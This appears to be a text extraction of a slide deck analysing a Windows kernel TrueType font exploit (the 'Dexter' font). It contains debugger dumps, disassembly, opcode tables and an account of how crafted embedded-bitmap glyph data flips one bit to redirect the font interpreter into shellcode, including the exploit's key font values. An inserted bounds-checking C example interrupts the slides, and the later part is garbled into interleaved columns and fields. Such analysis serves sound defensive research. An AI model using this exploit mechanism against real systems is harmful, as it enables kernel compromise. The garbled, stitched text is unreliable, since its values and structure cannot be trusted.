013abbbb  0c 00 66 00 03 00 01 04-09 00 02 00 0e 00 72 00  ..f...........r.
013abbcb  03 00 01 04 09 00 03 00-1c 00 80 00 03 00 01 04  ................
013abbdb  09 00 04 00 0c 00 66 03-09 00 01 04 09 00 05 00  ......f.........
013abbeb  18 00 9c 00 03 00 01 04-09 00 06 00 0c 00 66 00  ..............f.
013abbfb  03 00 01 04 09 00 07 00-62 00 b4 00 43 00 6f 00  ........b...C.o.
013abc0b  70 00 79 00 72 00 69 00-67 00 68 00 74 00 20 00  p.y.r.i.g.h.t. .

Flags
  0:  On  YDual  XDual
  1:  On  X-Short  Y-Short  YDual  XDual

00167: RS
00168: WCVTP

LAST_CONTROL_TRANSFER:  from bf85bff7 to e2482368

STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368
b207a9c8 bf85f92f 013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c
b207a9fc bf862709 e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103
b207aa94 bf85e8bc e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3
b207aaf0 bf85e779 e2481248 e2481f84 e2481764 win32k!fsg_CreateGlyphData+0xd5
b207ab30 bf85ed09 e2481248 e2481f84 e24812bc win32k!fsg_GridFit+0x4d
b207aba8 bf85c15d 00000001 b207abc4 bf85c18f win32k!fs__Contour+0x291
b207abb4 bf85c18f e2481010 e2481074 b207abdc win32k!fs_ContourGridFit+0x12

kd> U win32k!itrp_ExecuteGlyphPgm win32k!itrp_ExecuteGlyphPgm+60
win32k!itrp_ExecuteGlyphPgm:
bf85bfab 8bff            mov     edi,edi
bf85bfad 55              push    ebp
bf85bfae 8bec            mov     ebp,esp
bf85bfb0 51              push    ecx
bf85bfb1 53              push    ebx
bf85bfb2 8b5d10          mov     ebx,dword ptr [ebp+10h]
bf85bfb5 56              push    esi
bf85bfb6 894dfc          mov     dword ptr [ebp-4],ecx
bf85bfb9 57              push    edi
bf85bfba 8d7324          lea     esi,[ebx+24h]
[...]
bf85bfed 8b4dfc          mov     ecx,dword ptr [ebp-4]
bf85bff0 8bd0            mov     edx,eax
bf85bff2 e808330000      call    win32k!itrp_Execute (bf85f2ff)
bf85bff7 8bd0            mov     edx,eax          ; fault
bf85bff9 8b4b68          mov     ecx,dword ptr [ebx+68h]
bf85bffc 8b7330          mov     esi,dword ptr [ebx+30h]
bf85bfff 33c0            xor     eax,eax

This is the saved EIP (bf85bff7, the return address in the first frame).
So this CALL leads to shellcode exec.

And this argument? (e2481f84, the third argument of every frame)

kd> D e2481f84
e2481f84  fc 1a 48 e2 00 1f 48 e2-80 1f 48 e2 04 00 03 00  ..H...H...H.....
e2481f94  00 00 04 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
e2481fa4  00 00 00 00 44 00 00 00-00 00 00 00 00 00 00 00  ....D...........
e2481fb4  00 00 00 00 00 00 00 00-40 00 00 00 69 c2 85 bf  ........@...i...
e2481fc4  03 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
e2481fd4  09 00 03 00 80 00 00 00-01 00 00 00 44 00 00 00  ............D...
e2481fe4  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
e2481ff4  40 00 00 00 69 c2 85 bf-03 00 00 00 00 00 00 00  @...i...........

Obviously more pointers... (e2481afc, e2481f00, e2481f80)

Oh, and EDI is pointing just at the end of the TT program

kd> Db 013abb94
013abb94  b0 00 43 b0 03 43 44 31-37 01 01 00 00 00 00 08  ..C..CD17.......
013abba4  00 66 00 03 00 01 04 09-00 00 00 66 00 00 00 03  .f.........f....
013abbb4  00 01 04 09 00 01 00 0c-00 66 00 03 00 01 04 09  .........f......
013abbc4  00 02 00 0e 00 72 00 03-00 01 04 09 00 03 00 1c  .....r..........
013abbd4  00 80 00 03 00 01 04 09-00 04 00 0c 00 66 03 09  .............f..
013abbe4  00 01 04 09 00 05 00 18-00 9c 00 03 00 01 04 09  ................
013abbf4  00 06 00 0c 00 66 00 03-00 01 04 09 00 07 00 62  .....f.........b
013abc04  00 b4 00 43 00 6f 00 70-00 79 00 72 00 69 00 67  ...C.o.p.y.r.i.g

00161: SSW
00162: PUSHB[1] 0
00164: RS
00165: PUSHB[1] 3
00167: RS
00168: WCVTP

Oh yeah, and that stack overflow I mentioned earlier

kd> d b2077000
b2077000  e248236d e248236d e248236d e248236d
b2077010  e248236d e248236d e248236d e248236d
b2077020  e248236d e248236d e248236d e248236d
b2077030  e248236d e248236d e248236d e248236d
b2077040  e248236d e248236d e248236d e248236d
b2077050  e248236d e248236d e248236d e248236d
b2077060  e248236d e248236d e248236d e248236d
b2077070  e248236d e248236d e248236d e248236d

And another thing...

kd> d e2481fe0
e2481fe0  00000044 00000000 00000000 00000000
e2481ff0  00000000 00000040 bf85c269 00000003
e2482000  00000000 00000000 00000000 00030009
e2482010  00010080 00000001 e2481f80 e2481f80
e2482020  00000000 00000000 bf85bd4b bf85bd4b
e2482030  e2482368 e24bdbb3 0000000d e2482318
e2482040  0003b89b 00000000 00000000 00000000
e2482050  00000000 00000000 00000000 00000000
kd> u e2482368
e2482368 e8fbffffff      call    e2482368
e248236d 0000            add     byte ptr [eax],al
e248236f 0000            add     byte ptr [eax],al
e2482371 0000            add     byte ptr [eax],al

shellcode (the e2482368 pointer at e2482030). Distance: 80 (0x50) bytes, might be a clue

And another thing...

kd> dd /c8 e2481f84
e2481f84  e2481afc e2481f00 e2481f80 00030004 00040000 00000000 00000000 00000
e2481fa4  00000000 00000044 00000000 00000000 00000000 00000000 00000040 bf85c
e2481fc4  00000003 00000000 00000000 00000000 00030009 00000080 00000001 00000
e2481fe4  00000000 00000000 00000000 00000000 00000040 bf85c269 00000003 00000
e2482004  00000000 00000000 00030009 00010080 00000001 e2481f80 e2481f80 00000
e2482024  00000000 bf85bd4b bf85bd4b e2482368 e24bdbb3 0000000d e2482318 0003b
e2482044  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000
(last column cut off by the slide edge)

shellcode (the e2482368 pointer at e2482030). Distance: 172 (0xAC) bytes, might be a clue

Oh, and another thing...

kd> d /c8 e2481afc
e2481afc  00000001 e2482368 0000002c 00030009 00000000 00000000 00000000 00000
e2481b1c  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000
e2481b3c  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000
e2481b5c  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000
e2481b7c  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000
e2481b9c  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000
e2481bbc  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000
(last column cut off by the slide edge)

shellcode (the e2482368 pointer at e2481b00). Distance: 4 bytes, might be a clue

win32k.sys

IDA

• Ok, so for some reason itrp_Execute (x,x,x,x,x,x) is jumping into shellcode...

[IDA screenshots of win32k!itrp_Execute; only the slide captions survive]
Here's the function
Hey, what's all this? I've seen this somewhere before...
Instruction Set Summary
(http://developer.apple.com/font)

The following tables provide a quick summary of the names, opcodes, instruction stream and stack interaction of the TrueType instruction set. The first table lists those instructions that take data from the instruction stream and place it onto the interpreter stack. The second table lists the remaining TrueType instructions which take their arguments from the stack.

Table 1  Instructions taking data from the instruction stream

Instruction    Opcode        From Instruction Stream    Pushes
NPUSHB[ ]      0x40          n, b1, b2,...bn            b1, b2...bn
NPUSHW[ ]      0x41          n, w1, w2,...wn            w1, w2...wn
PUSHB[abc]     0xB0 - 0xB7   b0, b1,..bn                b0, b1, ...,bn
PUSHW[abc]     0xB8 - 0xBF   w0, w1,..wn                w0, w1, ...wn

Table 2  Instructions taking data from the interpreter stack

Instruction    Opcode        Pops                                     Pushes
AA[ ]          0x7F          p                                        -
ABS[ ]         0x64          n                                        |n|
ADD[ ]         0x60          n2, n1                                   (n1 + n2)
ALIGNPTS[ ]    0x27          p2, p1                                   -
ALIGNRP[ ]     0x3C          p1, p2, ... , ploopvalue                 -
AND[ ]         0x5A          e2, e1                                   b
CALL[ ]        0x2B          f                                        -
CEILING[ ]     0x67          n                                        ⌈n⌉
CINDEX[ ]      0x25          k                                        ek
CLEAR[ ]       0x22          all items on the stack                   -
DEBUG[ ]       0x4F          n                                        -
DELTAC1[ ]     0x73          argn, cn, argn-1, cn-1, ..., arg1, c1    -
DELTAC2[ ]     0x74          argn, cn, argn-1, cn-1, ..., arg1, c1    -
DELTAC3[ ]     0x75          argn, cn, argn-1, cn-1, ..., arg1, c1    -
DELTAP1[ ]     0x5D          argn, pn, argn-1, pn-1, ..., arg1, p1    -
DELTAP2[ ]     0x71          argn, pn, argn-1, pn-1, ..., arg1, p1    -
DELTAP3[ ]     0x72          argn, pn, argn-1, pn-1, ..., arg1, p1    -
DEPTH[ ]       0x24          -                                        n
DIV[ ]         0x62          n2, n1                                   (n1 * 64) / n2
DUP[ ]         0x20          e                                        e, e
EIF[ ]         0x59          -                                        -
ELSE           0x1B          -                                        -
ENDF[ ]        0x2D          -                                        -
EQ[ ]          0x54          e2, e1                                   b
EVEN[ ]        0x57          e                                        b
FDEF[ ]        0x2C          f                                        -
FLIPOFF[ ]     0x4E          -                                        -
FLIPON[ ]      0x4D          -                                        -
FLIPPT[ ]      0x80          p1, p2, ..., ploopvalue                  -
FLIPRGOFF[ ]   0x82          h, l                                     -
FLIPRGON[ ]    0x81          h, l                                     -
FLOOR[ ]       0x66          n                                        ⌊n⌋
GC[a]          0x46 - 0x47   p                                        c
GETINFO[ ]     0x88          selector                                 result
GFV[ ]         0x0D          -                                        px, py
GPV[ ]         0x0C          -                                        px, py
GT[ ]          0x52          e2, e1                                   b
GTEQ[ ]        0x53          e2, e1                                   b
IDEF[ ]        0x89          f                                        -
IF[ ]          0x58          e                                        -
INSTCTRL       0x8E          s, v                                     -
IP[ ]          0x39          p1, p2, ... , ploopvalue                 -
ISECT[ ]       0x0F          a1, a0, b1, b0, p                        -
IUP[a]         0x30 - 0x31   -                                        -
JMPR           0x1C          offset                                   -
JROF[ ]        0x79          e, offset                                -
JROT[ ]        0x78          e, offset                                -
LOOPCALL[ ]    0x2A          f, count                                 -
MINDEX[ ]      0x26          k                                        ek
MIRP[abcde]    0xE0 - 0xFF   n, p                                     -
MPPEM[ ]       0x4B          -                                        ppem
MPS[ ]         0x4C          -                                        pointSize
MSIRP[a]       0x3A - 0x3B   d, p                                     -
MUL[ ]         0x63          n2, n1                                   (n1 * n2) / 64
NEG[ ]         0x65          n                                        -n
NEQ[ ]         0x55          e2, e1                                   b
NOT[ ]         0x5C          e                                        (not e)
NROUND[ab]     0x6C - 0x6F   n1                                       n2
ODD[ ]         0x56          e                                        b
OR[ ]          0x5B          e2, e1                                   b
POP[ ]         0x21          e                                        -
RCVT[ ]        0x45          location                                 value
RDTG[ ]        0x7D          -                                        -
ROFF[ ]        0x7A          -                                        -

Instruction    Opcode
ADD[ ]         0x60
SUB[ ]         0x61
DIV[ ]         0x62
MUL[ ]         0x63
ABS[ ]         0x64
NEG[ ]         0x65
FLOOR[ ]       0x66
etc.

[IDA screenshots of the opcode handlers in win32k.sys; only the slide captions survive]
All these functions start out like this
And by 'all' I mean 190 of them.
Must be a pointer to some kind of global TrueType VM state.
And this must be some kind of error code.
Especially since it's always used like this
Ditto on this one (201 references)
This VM global only seems to be involved with CALL and LOOPCALL
This VM global only seems to be involved with Relative Jumps
This VM global only seems to be involved with Conditionals
There is a debugging symbol for this one. I'm guessing "Graphics State".
There's no corresponding "GlobalGS" symbol, except for in this function's name.

Getting on with it...

So, this is the last spot that EBP points to when the shellcode runs
Somewhere in itrp_Execute() is a CALL or JMP to the shellcode...
This is the main loop of the opcode interpreter
This is the opcode function jump table

Many Hours Later...

WCVTP[]  Write Control Value Table in Pixel units (32 bits)

Code Range     0x44
Pops           v: value in pixels (F26Dot6)
               l: control value table location (uint32)
Pushes         -
Sets control value table entry
Related instructions   WCVTF[ ]

Writes the value in pixels into the control value table location specified.

Pops a value v and a control value table location l from the stack and puts that value in the specified location in the control value table. This instruction assumes the value taken from the stack is in pixels and not in FUnits. The value is written to the CVT table unchanged. The location l must be less than the number of storage locations specified in the 'maxp' table in the font file.

TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0         nv up ei ng nz ac pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010296
e2482368 e8fbffffff      call    e2482368
kd> dd /c8 e2481f84
e2481f84  e2481afc e2481f00 e2481f80 00030004 00040000 00000000 00000000 00000
e2481fa4  00000000 00000044 00000000 00000000 00000000 00000000 00000040 bf85c
e2481fc4  00000003 00000000 00000000 00000000 00030009 00000080 00000001 00000
e2481fe4  00000000 00000000 00000000 00000000 00000040 bf85c269 00000003 00000
e2482004  00000000 00000000 00030009 00010080 00000001 e2481f80 e2481f80 00000
e2482024  00000000 bf85bd4b bf85bd4b e2482368 e24bdbb3 0000000d e2482318 0003b
e2482044  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000
(last column cut off by the slide edge)
kd> d e2481f84+134
e24820b8  00000081 00040000 00040000 00040000
e24820c8  00040000 00000000 00000001 00002710
e24820d8  00000064 00989680 e1c5d4b0 e2481efc
e24820e8  00000006 00000000 00000000 00000000

Pointer to Global Graphics State (Likely called "GlobalGS")
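The Apple reference quoted above fixes WCVT's contract: pop v, pop l, write cvt[l], with l required to be below the count taken from 'maxp'; the instruction-set summary gives the PUSHB stream encoding; and the glyph program on the earlier slides ends with exactly PUSHB[1] 0; RS; PUSHB[1] 3; RS; WCVTP. The C below is an added example, not code from the talk or from win32k: a minimal interpreter for those opcodes that enforces the bounds the reference states, run over that seven-byte tail with a constructed CVT and storage area. The tt_vm layout, the function names and the error codes are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Added example: a minimal TrueType glyph-program interpreter that enforces
 * the bounds the Apple reference states for WCVTP (l below the CVT entry
 * count) and for RS (location below maxStorage).  The tt_vm layout, the
 * function names and the error codes are assumptions of this example; none
 * of it is win32k's fnt_* state or the talk's own code. */

enum tt_status {
    TT_OK = 0,
    TT_ERR_STACK_UNDERFLOW,
    TT_ERR_STACK_OVERFLOW,
    TT_ERR_STREAM_TRUNCATED,  /* PUSHB[abc] needs more bytes than remain */
    TT_ERR_CVT_RANGE,         /* WCVTP location outside the CVT          */
    TT_ERR_STORAGE_RANGE,     /* RS location outside the storage area    */
    TT_ERR_BAD_OPCODE
};

#define TT_STACK_DEPTH 32

typedef struct {
    int32_t  stack[TT_STACK_DEPTH];
    size_t   sp;                          /* elements currently on the stack  */
    int32_t *cvt;   size_t cvt_count;     /* Control Value Table and its size */
    int32_t *store; size_t store_count;   /* Storage Area, maxStorage entries */
} tt_vm;

static int tt_push(tt_vm *vm, int32_t v) {
    if (vm->sp >= TT_STACK_DEPTH) return TT_ERR_STACK_OVERFLOW;
    vm->stack[vm->sp++] = v;
    return TT_OK;
}

static int tt_pop(tt_vm *vm, int32_t *out) {
    if (vm->sp == 0) return TT_ERR_STACK_UNDERFLOW;
    *out = vm->stack[--vm->sp];
    return TT_OK;
}

/* Executes pgm[0..len) and returns TT_OK or the first error met.
 * Opcodes handled: PUSHB[abc] 0xB0-0xB7, RS 0x43, WCVTP 0x44. */
int tt_execute(tt_vm *vm, const uint8_t *pgm, size_t len) {
    size_t ip = 0;
    int rc;
    while (ip < len) {
        uint8_t op = pgm[ip++];
        if (op >= 0xB0 && op <= 0xB7) {
            /* PUSHB[abc]: (op & 7) + 1 bytes follow in the instruction stream. */
            size_t n = (size_t)(op & 7) + 1;
            if (len - ip < n) return TT_ERR_STREAM_TRUNCATED;
            for (size_t i = 0; i < n; i++)
                if ((rc = tt_push(vm, pgm[ip++])) != TT_OK) return rc;
        } else if (op == 0x43) {
            /* RS: pop location, push store[location]. */
            int32_t loc;
            if ((rc = tt_pop(vm, &loc)) != TT_OK) return rc;
            if (loc < 0 || (size_t)loc >= vm->store_count) return TT_ERR_STORAGE_RANGE;
            if ((rc = tt_push(vm, vm->store[loc])) != TT_OK) return rc;
        } else if (op == 0x44) {
            /* WCVTP: pop value v (F26Dot6), then location l.  The check on l
             * is the "must be less than the number of ... locations" rule. */
            int32_t v, l;
            if ((rc = tt_pop(vm, &v)) != TT_OK) return rc;
            if ((rc = tt_pop(vm, &l)) != TT_OK) return rc;
            if (l < 0 || (size_t)l >= vm->cvt_count) return TT_ERR_CVT_RANGE;
            vm->cvt[l] = v;
        } else {
            return TT_ERR_BAD_OPCODE;
        }
    }
    return TT_OK;
}

/* Runs any program against a constructed, zeroed state (8 CVT entries,
 * 4 storage entries) and returns the status. */
int tt_check_program(const uint8_t *pgm, size_t len) {
    int32_t cvt[8] = { 0 }, store[4] = { 0 };
    tt_vm vm = { { 0 }, 0, cvt, 8, store, 4 };
    return tt_execute(&vm, pgm, len);
}

/* Runs the last seven bytes of the glyph program shown on the slides,
 * PUSHB[1] 0; RS; PUSHB[1] 3; RS; WCVTP, with storage[0] = loc (the CVT
 * location) and storage[3] = value; cvt_count is clamped to the 8-entry demo
 * buffer.  Returns the CVT entry written, or -1 if the program was rejected. */
int32_t tt_run_tail(int32_t loc, int32_t value, size_t cvt_count) {
    static const uint8_t tail[] = { 0xB0, 0x00, 0x43, 0xB0, 0x03, 0x43, 0x44 };
    int32_t cvt[8] = { 0 }, store[4] = { loc, 0, 0, value };
    tt_vm vm = { { 0 }, 0, cvt, cvt_count > 8 ? 8 : cvt_count, store, 4 };
    if (tt_execute(&vm, tail, sizeof tail) != TT_OK) return -1;
    return cvt[loc];
}

int main(void) {
    printf("WCVTP in range (l=2):  cvt[2] = %d\n", (int)tt_run_tail(2, 0x40, 8));
    printf("WCVTP past end (l=8):  %d (rejected)\n", (int)tt_run_tail(8, 0x40, 8));
    printf("WCVTP negative (l=-1): %d (rejected)\n", (int)tt_run_tail(-1, 0x40, 8));
    return 0;
}
```

The design point is that every index the glyph program controls (the PUSHB operands, the RS location, the WCVTP location) is compared against a count carried in the interpreter state before memory is touched, and a violation ends execution with a status instead of a write; the stack depth is bounded the same way so a program cannot push past the interpreter stack either.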
The following slides repeat the same dd /c8 e2481f84 and d e2481f84+134 dumps, each one pointing at one field of the structure:

Pointer to TT Interpreter Stack Base
Pointer to "Storage Area"
Pointer to "Control Value Table"
Pixels per em
Point Size
CVT Count
X and Y scalars for "instructable" and "metric" things
End of Global Structure (I think)

But this is the important part!
Because this is the location of the single bit overwrite by the exploit (the 00000081 at e24820b8).
It was originally 0x01, but now it's 0x81

Normally the CVT is pointed to here.
It's just before the Global State stuff in memory

Vulnerable Code

win32k!sfac_GetSbitBitmap+0x56:
953cdc49 8b553c          mov     edx,dword ptr [ebp+3Ch]
953cdc4c 33c9            xor     ecx,ecx
953cdc4e 53              push    ebx
953cdc4f 8bd8            mov     ebx,eax          ; ?
953cdc51 0fb74530
953cdc55 66890a
953cdc58 0fb74d2c
953cdc5c 8b5534
953cdc5f 0fafc8
953cdc62 8b4528
953cdc65 034d38
movzx mov movzx mov imul mov add eax,word ptr [ebp+30h] ss:0010:95f3f2d0 = 0020 ; usDstRowBytes word ptr [edx],cx ; [ebp+3Ch] = 0 ecx,word ptr [ebp+2Ch] ss:0010:95f3f2cc = 0052 ; usYOffset edx,dword ptr [ebp+34h] ss:0010:95f3f2d4 = 0001 ; usBitDepth ecx,eax ; ecx=00000a40 eax,dword ptr [ebp+28h] ; usShaveTop ecx,dword ptr [ebp+38h] ; ecx=fe2740c4 ; pusCompCount + 0xb1 + 0xa40 ; == 0 EBLC tables and stuff • So, the “Dexter” font has only six characters defined in it, and four of them are zero by zero glyphs of zero length • The other two trigger the vulnerability, you need two, because it’s in the code that adjusts the distance between the two • So, the two characters are, and must appear in this order: :) Friday, March 8, 2013 'EBLC' Table - Embedded Bitmap Location Table --------------------------------------------Version: 2.0 Number of Sizes: 6 Strike 1 ========= Index Array Offset: Size of Index Tables: Number of Index Tables: Color Reference Offset: Horizontal Line Metrics Ascender: Descender: Max Width: Caret Numer: Caret Denom: Caret Offset: Min Orig SB: Min Adv SB: Max Befor BL: Max After BL: Vertical Line Metrics Ascender: Descender: Max Width: Caret Numer: Caret Denom: Caret Offset: Min Orig SB: Min Adv SB: Max Befor BL: Max After BL: End of Line Metrics Start Glyph Index: End Glyph Index: ppem X: ppem Y: Bit Depth: Flags: Friday, March 8, 2013 0x00000128 0x00000028 2 0x00000000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 3 4 4 4 8 0x01 EBLC Index Sub Table 1 -----------------First Glyph Index: Last Glyph Index: Index Format: Image Format: Image Data Offset Base: Glyph: 3 Offset: Last Offset: 3 3 3 1 0x00000004 0x00000004 0x0000000a Index Sub Table 2 -----------------First Glyph Index: Last Glyph Index: Index Format: Image Format: Image Data Offset Base: Glyph: 4 Offset: Last Offset: 4 4 3 8 0x0000000a 0x0000000a 0x00000016 Strike 2 ========= Index Array Offset: Size of Index Tables: Number of Index Tables: Color Reference Offset: Horizontal Line Metrics 
Ascender: Descender: Max Width: Caret Numer: Caret Denom: Caret Offset: Min Orig SB: Min Adv SB: Max Befor BL: Max After BL: Vertical Line Metrics Ascender: Descender: Max Width: Caret Numer: Caret Denom: Caret Offset: Min Orig SB: So, if you could read this, you’d see that the first five characters point to the same place 0x00000128 0x00000028 2 0x00000000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 Strike 6 ========= Index Array Offset: Size of Index Tables: Number of Index Tables: Color Reference Offset: Horizontal Line Metrics Ascender: Descender: Max Width: Caret Numer: Caret Denom: Caret Offset: Min Orig SB: Min Adv SB: Max Befor BL: Max After BL: Vertical Line Metrics Ascender: Descender: Max Width: Caret Numer: Caret Denom: Caret Offset: Min Orig SB: Min Adv SB: Max Befor BL: Max After BL: End of Line Metrics Start Glyph Index: End Glyph Index: ppem X: ppem Y: Bit Depth: Flags: Friday, March 8, 2013 0x00000150 0x00000028 2 0x00000000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 3 4 1 1 1 0x01 EBLC Index Sub Table 1 -----------------First Glyph Index: Last Glyph Index: Index Format: Image Format: Image Data Offset Base: Glyph: 3 Offset: Last Offset: 3 3 3 1 0x00000016 0x00000016 0x0000001c Index Sub Table 2 -----------------First Glyph Index: Last Glyph Index: Index Format: Image Format: Image Data Offset Base: Glyph: 4 Offset: Last Offset: 4 4 3 8 0x0000001c 0x0000001c 0x00000028 'EBDT' Table - Embedded Bitmap Data Table ----------------------------------------Version: 2.0 Strike 1 Size = 4 ---------------------Glyph 3 Metrics: Image: Glyph 4 Metrics: Component Glyph: Component[0]: H:01 W:01 X:00 80 H:01 W:ff X:00 numComponents: glyphCode = 3, EBDT Y:00 A:00 Y:00 A:00 1 xOffset = 72, yOffset = 10 Strike 3 Size = 6 ---------------------Strike 2 Size = 5 Glyph 3 Metrics: ---------------------Image: Glyph 3 Metrics: H:01 W:01 X:00 Y:00 A:00 Glyph 4 Metrics: Image: 80 Component Glyph: Glyph 4 Metrics: H:01 W:ff X:00 Y:00 A:00 Component[0]: Component Glyph: numComponents: 1 
Component[0]: glyphCode = 3, xOffset = 72, yOffset = 10 Friday, March 8, 2013 H:01 W:01 X:00 80 H:01 W:ff X:00 numComponents: glyphCode = 3, Y:00 A:00 Strike 4 Size = 7 ---------------------Glyph 3 Metrics: Image: Glyph 4 Metrics: Component Glyph: Component[0]: H:01 W:01 X:00 80 H:01 W:ff X:00 numComponents: glyphCode = 3, Y:00 A:00 Strike 5 Size = 8 ---------------------Glyph 3 Metrics: Image: Glyph 4 Metrics: Component Glyph: H:01 W:01 X:00 Y:00 A:00 80 H:01 W:ff X:00 Y:00 A:00 numComponents: 1 Y:00 A:00 1 xOffset = 72, yOffset = 10 Y:00 A:00 1 xOffset = 72, yOffset = 10 Strike 5 Size = 8 ---------------------Glyph 3 Metrics: Image: Glyph 4 Metrics: Component Glyph: Component[0]: Strike 6 Size = 1 ---------------------Glyph 3 Metrics: Image: Glyph 4 Metrics: Component Glyph: Component[0]: EBDT H:01 W:01 X:00 80 H:01 W:ff X:00 numComponents: glyphCode = 3, Y:00 A:00 Y:00 A:00 1 xOffset = 72, yOffset = 10 This is the exploit H:01 W:01 X:00 80 H:01 W:ff X:00 numComponents: glyphCode = 3, Y:00 A:00 Y:00 A:00 1 xOffset = 64, yOffset = 82 A one by one pixel bitmap of 0x80 Friday, March 8, 2013 Strike 5 Size = 8 ---------------------Glyph 3 Metrics: Image: Glyph 4 Metrics: Component Glyph: Component[0]: Strike 6 Size = 1 ---------------------Glyph 3 Metrics: Image: Glyph 4 Metrics: Component Glyph: Component[0]: Friday, March 8, 2013 EBDT H:01 W:01 X:00 80 H:01 W:ff X:00 numComponents: glyphCode = 3, Y:00 A:00 Y:00 A:00 1 xOffset = 72, yOffset = 10 This controls where in memory H:01 W:01 X:00 80 H:01 W:ff X:00 numComponents: glyphCode = 3, Y:00 A:00 This getsY:00 OR’d A:00in memory 1 xOffset = 64, yOffset = 82 Exploit Implementation Friday, March 8, 2013 CVT e2481f80 00000000 CVT+4 = Global State kd> dd e2481f84 L100 e2481f84 e2481afc e2481f00 e2481f80 00030004 [CVT+4] = Stack Base e2481f94 00040000 00000000 00000000 00000000 e2481fa4 00000000 00000044 00000000 00000000 e2481fb4 00000000 00000000 00000040 bf85c269 e2481fc4 00000003 00000000 00000000 00000000 +0x90: 
auto_flip e2481fd4 00030009 00000080 00000001 00000044 e2481fe4 00000000 00000000 00000000 00000000 e2481ff4 00000040 bf85c269 00000003 00000000 e2482004 00000000 00000000 00030009 00010080 e2482014 00000001 e2481f80 e2481f80 00000000 e2482024 00000000 bf85bd4b bf85bd4b e2482368 e2482034 e24bdbb3 0000000d e2482318 0003b89b e2482044 00000000 00000000 00000000 00000000 e2482054 00000000 00000000 00000000 00000000 CVT+[4*0x25]= [CVT+0x94] = [Global State +0x90] e2482064 00002000 00000400 00000080 0000000a e2482074 00002000 00000400 00000080 0000000a e2482084 00002000State 00000400 00000080 0000000a CVT=Global -4 e2482094 00010000 00010000 00000001 00000000 e24820a4 00000000 00000200 00000000 00000001 e24820b4 e2481290 00000081 00040000 00040000 e24820c4 00040000 00040000 00000000 00000001 e24820d4 00002710 00000064 00989680 e1c5d4b0 Friday, March 8, 2013 e2481f80 00000000 CVT+4 = Global State kd> dd e2481f84 L100 00030004 CVT e2481f84 e2481afc e2481f00 e2481f80 [CVT+4] = Stack Base e2481f94 00040000 00000000 00000000 00000000 e2481fa4 00000000 00000044 00000000 00000000 e2481fb4 00000000 00000000 00000040 bf85c269 e2481fc4 00000003 00000000 00000000 00000000 +0x90: auto_flip e2481fd4 00030009 00000080 00000001 00000044 e2481fe4 00000000 00000000 00000000 00000000 e2481ff4 00000040 bf85c269 00000003 00000000 e2482004 00000000 00000000 00030009 00010080 e2482014 00000001 e2481f80 e2481f80 00000000 e2482024 00000000 bf85bd4b bf85bd4b e2482368 e2482034 e24bdbb3 0000000d e2482318 0003b89b e2482044 00000000 00000000 00000000 00000000 ; __fastcall itrp_FLIPON(x, x) e2482054 proc 00000000 00000000 ;00000000 @itrp_FLIPON@8 near CODE XREF: 00000000 itrp_InnerExecute(x,x)+2B^Xp itrp_InnerTraceExecute(x,x)+56^Yp e2482064 00002000 00000400 ;00000080 0000000a ; DATA XREF: ... 
e2482074 mov 00002000 00000400 00000080 0000000a eax, ecx e2482084 mov 00002000 00000080 0000000a ecx, 00000400 dword_BF9A9234 byte 00010000 ptr [ecx+90h], 1 e2482094 mov 00010000 00000001 00000000 retn e24820a4 00000000 00000200 00000000 00000001 @itrp_FLIPON@8 endp e24820b4 e2481290 00000081 00040000 00040000 e24820c4 00040000 00040000 00000000 00000001 e24820d4 00002710 00000064 00989680 e1c5d4b0 Friday, March 8, 2013 Graphics State Summary Aha! The following tables summarize the variables that make up the Graphics State. Nearly all of the Graphics State variables have a default value as shown below. That value is reestablished for every glyph in a font. Instructions are available for resetting the value of all Graphics State variables. Some state variables can be reset in the CVT Program. In such cases the value set becomes the new default and will be reestablished for each glyph. When value of a state variable is changed by instructions associated with a particular glyph, it will hold only for that glyph. The setting of the Graphics State variables will affect the actions of certain instructions. Affected instructions are listed for each variable. Graphics State Variable Default Set With Affects auto_flip TRUE FLIPOFF FLIPON MIAP MIRP control_value_cut_in 17/16 pixels SCVTCI MIAP MIRP delta_base 9 SDB DELTAP1 DELTAP2 DELTAP3 DELTAC1 DELTAC2 DELTAC3 delta_shift 3 SDS DELTAP1 DELTAP2 DELTAP3 DELTAC1 DELTAC2 DELTAC3 dual_projection_vectors — SDPVTL IP GC MD MDRP MIRP Revision 1.66 File Name: grstate.doc Friday, March 8, 2013 Page 357 In other words, ABS() Managing the direction of distances The auto_flip variable owes its existence to the fact that the TrueType interpreter distinguishes between distances measured in the direction of the projection_vector (positive distances) and those that are measured in the direction opposite to the projection_vector (negative distances). 
